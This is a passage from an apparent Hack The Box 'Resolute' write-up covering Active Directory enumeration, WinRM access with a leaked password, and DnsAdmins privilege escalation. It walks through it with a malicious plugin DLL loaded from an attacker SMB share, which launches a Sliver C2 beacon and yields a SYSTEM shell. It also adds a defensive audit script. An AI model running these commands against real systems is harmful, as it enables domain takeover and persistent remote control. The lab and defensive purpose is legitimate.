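    if not start:
        raise KeyError(sam)
    seen, stack = set(), [start[0]]
    while stack:
        dn = stack.pop()
        for g in parents.get(dn, ()):
            if g not in seen:                     # also guards against cycles
                seen.add(g)
                if transitive:
                    stack.append(g)
    return {by_dn[g]["cn"][0] if g in by_dn else g for g in seen}


if __name__ == "__main__":
    text = open(sys.argv[1], encoding="utf-8", errors="replace").read() if len(sys.argv) > 1 else SAMPLE_LDIF
    entries = parse_ldif(text)
    print("\n".join(user_accounts(entries)))       # feed this list to kerbrute
    print("ryan direct:   ", sorted(groups_of(entries, "ryan", transitive=False)))
    print("ryan effective:", sorted(groups_of(entries, "ryan")))
```

The forward `member` edge is the one to trust: `memberOf` is a backlink that anonymous reads often cannot see, while group objects tend to be readable. Primary group membership (Domain Users via primaryGroupID) is not expressed as either link, which is why the sample's `net user` equivalent lacks it.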

As expected, we don't have write access to any of the shares psexec relies on. NetExec's SMB Pwn3d! flag comes from its own admin heuristic (it tries to open the remote Service Control Manager with full access rather than writing to a share), so it is not proof that a psexec-style service upload will work.

```
$ psexec.py -dc-ip 10.129.201.75 megabank.local/ryan:'Serv3r4Admin4cc123!'@resolute.megabank.local -target-ip 10.129.201.75
Impacket v0.12.0.dev1+20240819.165705.f98c9870 - Copyright 2023 Fortra

[*] Requesting shares on 10.129.201.75.....
[-] share 'ADMIN$' is not writable.
[-] share 'C$' is not writable.
[-] share 'NETLOGON' is not writable.
[-] share 'SYSVOL' is not writable.
```

We can still pivot to the user ryan over evil-winrm, since Contractors is in Remote Management Users.

```
$ evil-winrm -i 10.129.201.75 -u ryan -p 'Serv3r4Admin4cc123!'

Evil-WinRM shell v3.5

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\ryan\Documents> whoami
megabank\ryan
```

Privilege Escalation

We know that ryan is indirectly a member of the DnsAdmins group.

We can read this post on privilege escalation by loading a DLL into the DNS server process: since that process runs with high privileges, we get to execute commands as a privileged user and escalate.

I'm going to use this PoC.

We clone the repository.

C:\Users\pc\Desktop\dlladmin>git clone https://github.com/kazkansouh/DNSAdmin-DLL
Cloning into 'DNSAdmin-DLL'...
remote: Enumerating objects: 15, done.
remote: Counting objects: 100% (15/15), done.
remote: Compressing objects: 100% (12/12), done.
remote: Total 15 (delta 3), reused 15 (delta 3), pack-reused 0 (from 0)
Receiving objects: 100% (15/15), 21.70 KiB | 1.21 MiB/s, done.
Resolving deltas: 100% (3/3), done.

We open it in Visual Studio and, in the file DNSAdmin-DLL.cpp, change the body of the DnsPluginInitialize function. This is the function in which we get to run a command at SYSTEM level.

We modify the code so that it simply runs the executable of the Sliver beacon that we will create later.

#include <windows.h>
#include <stdlib.h>

// Entry point the DNS service calls when it loads the plugin DLL.
// dns.exe runs as SYSTEM, so anything started here inherits that privilege.
DWORD WINAPI DnsPluginInitialize(
	PVOID pDnsAllocateFunction,
	PVOID pDnsFreeFunction)
{
	// Launch the Sliver beacon uploaded to C:\test\s.exe later in this writeup.
	system("c:\\test\\s.exe");
	return ERROR_SUCCESS;
}

Now we build the project in Release.

Here we have the DLL.

We transfer it to our attacking machine by setting up an SMB server with impacket-smbserver.

$ sudo impacket-smbserver -smb2support smbFolder .

Let's generate a beacon with Sliver.

[server] sliver > generate beacon --os windows --format exe --seconds 5 --mtls 10.10.14.125 --arch amd64

[*] Generating new windows/amd64 beacon implant binary (5s)
[*] Symbol obfuscation is enabled
[*] Build completed in 46s
[*] Implant saved to /home/pointedsec/Desktop/resolute/LUCKY_SPEND.exe

I have now uploaded it to the victim machine as C:\test\s.exe.

*Evil-WinRM* PS C:\test> dir


    Directory: C:\test


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----         9/7/2024  11:53 AM       15817728 s.exe
-a----         9/7/2024  11:52 AM            137 users.txt

Now, with the SMB server running.

$ sudo impacket-smbserver -smb2support smbFolder .
Impacket v0.12.0.dev1+20240819.165705.f98c9870 - Copyright 2023 Fortra

[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
09/07/2024 10:58:05 PM: INFO: Config file parsed

We now point the plugin DLL that the service will load the next time it starts at the DLL on our machine, served over SMB.

*Evil-WinRM* PS C:\test> dnscmd resolute /config /serverlevelplugindll \\10.10.14.125\smbFolder\privesc.dll

Registry property serverlevelplugindll successfully reset.
Command completed successfully.

We can check that everything went well.

*Evil-WinRM* PS C:\test> Get-ItemProperty HKLM:\SYSTEM\CurrentControlSet\Services\DNS\Parameters\ -Name ServerLevelPluginDll


ServerLevelPluginDll : \\10.10.14.125\smbFolder\privesc.dll
PSPath               : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\DNS\Parameters\
PSParentPath         : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\DNS
PSChildName          : Parameters
PSDrive              : HKLM
PSProvider           : Microsoft.PowerShell.Core\Registry

We can see that the value of ServerLevelPluginDll is \\10.10.14.125\smbFolder\privesc.dll, which is our DLL.

Now all that remains is to restart the service.

*Evil-WinRM* PS C:\test> sc.exe \\resolute stop dns

SERVICE_NAME: dns
        TYPE               : 10  WIN32_OWN_PROCESS
        STATE              : 3  STOP_PENDING
                                (STOPPABLE, PAUSABLE, ACCEPTS_SHUTDOWN)
        WIN32_EXIT_CODE    : 0  (0x0)
        SERVICE_EXIT_CODE  : 0  (0x0)
        CHECKPOINT         : 0x0
        WAIT_HINT          : 0x0
*Evil-WinRM* PS C:\test> sc.exe \\resolute start dns

SERVICE_NAME: dns
        TYPE               : 10  WIN32_OWN_PROCESS
        STATE              : 2  START_PENDING
                                (NOT_STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN)
        WIN32_EXIT_CODE    : 0  (0x0)
        SERVICE_EXIT_CODE  : 0  (0x0)
        CHECKPOINT         : 0x0
        WAIT_HINT          : 0x7d0
        PID                : 3728
        FLAGS              :
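As an added defender-side example (not part of the original writeup or of the DNSAdmin-DLL project), the following PowerShell audits the two things this escalation depends on: a ServerLevelPluginDll value pointing at a UNC or non-System32 path, and effective DnsAdmins membership through nested groups such as Contractors. It assumes it is run as an administrator on the DNS server / DC with the ActiveDirectory module installed; $findings is just the result list this script builds.

```powershell
# Added audit script, not from the original writeup. Run on the DNS server/DC.
Import-Module ActiveDirectory

$findings = @()
$params   = 'HKLM:\SYSTEM\CurrentControlSet\Services\DNS\Parameters'
$system32 = Join-Path $env:SystemRoot 'System32'

# 1. dns.exe (running as SYSTEM) loads ServerLevelPluginDll on service start.
#    A UNC path, or any path outside System32, is the pattern abused above.
$plugin = (Get-ItemProperty -Path $params -Name ServerLevelPluginDll `
              -ErrorAction SilentlyContinue).ServerLevelPluginDll
if (-not [string]::IsNullOrEmpty($plugin)) {
    if ($plugin.StartsWith('\\')) {
        $findings += "ServerLevelPluginDll is a UNC path: $plugin"
    } elseif (-not $plugin.StartsWith($system32, [System.StringComparison]::OrdinalIgnoreCase)) {
        $findings += "ServerLevelPluginDll is outside System32: $plugin"
    } else {
        $findings += "ServerLevelPluginDll is set; confirm it is expected: $plugin"
    }
    # Remediation once confirmed malicious: remove the value, then restart DNS.
    # Remove-ItemProperty -Path $params -Name ServerLevelPluginDll
}

# 2. Effective DnsAdmins members, resolving nested groups (e.g. Contractors).
#    Every account listed here can set the value above via dnscmd.
$members = Get-ADGroupMember -Identity 'DnsAdmins' -Recursive |
           Where-Object { $_.objectClass -eq 'user' }
foreach ($m in $members) {
    $findings += "Effective DnsAdmins member: $($m.SamAccountName)"
}

if ($findings.Count -eq 0) { 'No findings.' } else { $findings }
```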

And in Sliver we see a new beacon arrive.

[*] Beacon ff2756b4 LUCKY_SPEND - 10.129.201.75:51717 (Resolute) - windows/amd64 - Sat, 07 Sep 2024 22:52:48 CEST

And we see a beacon running as NT AUTHORITY\SYSTEM.

[server] sliver > beacons

 ID         Name              Transport   Hostname     Username              Operating System   Last Check-In   Next Check-In
========== ================= =========== ============ ===================== ================== =============== ===============
 17f341b1   DEVELOPING_BELL   mtls        Acute-PC01   ACUTE\edavies         windows/amd64      24h46m52s       24h46m45s
 5662342a   DEVELOPING_BELL   mtls        Acute-PC01   ACUTE\edavies         windows/amd64      24h43m37s       24h43m32s
 d503925b   DEVELOPING_BELL   mtls        Acute-PC01   ACUTE\edavies         windows/amd64      21h42m29s       21h42m24s
 534e5b6d   LUCKY_SPEND       mtls        Resolute     MEGABANK\ryan         windows/amd64      21s             2s
 ff2756b4   LUCKY_SPEND       mtls        Resolute     NT AUTHORITY\SYSTEM   windows/amd64      12s             18s

Now we can switch to a session to get a console.

We select the beacon.

[server] sliver > use ff2756b4

[*] Active beacon LUCKY_SPEND (ff2756b4-8ce0-4621-951c-7b8a0274dafc)

We create the session.

[server] sliver (LUCKY_SPEND) > interactive

[*] Using beacon's active C2 endpoint: mtls://10.10.14.125:8888
[*] Tasked beacon LUCKY_SPEND (8f35a81f)

[*] Session 9b99e9cc LUCKY_SPEND - 10.129.201.75:51954 (Resolute) - windows/amd64 - Sat, 07 Sep 2024 23:02:21 CEST

We select this session.

[server] sliver (LUCKY_SPEND) > use 9b99e9cc

[*] Active session LUCKY_SPEND (9b99e9cc-2e72-4ddf-a05d-7314b47e7721)

And we get an interactive console.

[server] sliver (LUCKY_SPEND) > shell

? This action is bad OPSEC, are you an adult? Yes

[*] Wait approximately 10 seconds after exit, and press <enter> to continue
[*] Opening shell tunnel (EOF to exit) ...

[*] Started remote shell with pid 656

PS C:\Windows\system32> whoami
whoami
nt authority\system

We can read the root flag.

PS C:\Users\Administrator\Desktop> type root.txt
type root.txt
dea00efd37ab...

And that's it!

Happy Hacking! 🚀

#HackTheBox   #Resolute   #Writeup   #Cybersecurity   #Penetration Testing   #CTF   #Reverse Shell   #Privilege Escalation   #RCE   #Exploit   #Windows   #SMB Enumeration   #LDAP Enumeration   #Kerbrute   #ASREPRoast   #RPC Enumeration   #Information Disclosure   #Password Spraying   #Abusing WinRM   #User Pivoting   #Bloodhound Enumeration   #Winpeas Enumeration   #Abusing DnsAdmin Group   #Sliver   #C2   #Creating Malicious DLL